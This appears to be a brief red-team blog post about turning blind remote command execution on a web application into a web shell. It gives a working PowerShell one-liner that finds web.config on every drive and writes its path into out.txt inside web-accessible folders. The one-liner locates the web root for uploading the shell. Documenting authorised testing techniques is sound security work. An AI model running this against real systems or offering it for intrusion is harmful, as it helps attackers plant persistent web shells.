On a recent red team engagement, I came across a blind remote command execution on a web application. I needed to find the web root to write and upload a web shell. Why?

  • Web server service does not have administrative privilege
  • Outbound connection to the Internet is not available (no reverse shell)
  • Web root is in a custom and very hard to guess location

Anyway, here’s a one-liner that remedies these issues. This will enumerate all the drive in the system, in each drive, find web.config and in it’s path, write out.txt containing the local path of web.config.

(Get-PSDrive -PSProvider FileSystem).Root | ForEach-Object {(Get-ChildItem -Path $_ -Filter "web.config" -Recurse -ErrorAction SilentlyContinue -Force).DirectoryName | ForEach-Object {Out-File -FilePath "$_\\out.txt" -InputObject $_ -Force -ErrorAction SilentlyContinue}}

Change the value of -Filter "web.config" to your target file.

Added to Cache – https://github.com/crimsonlabs-io/Cache/blob/main/Attacker/scripts/FindWebroot.ps1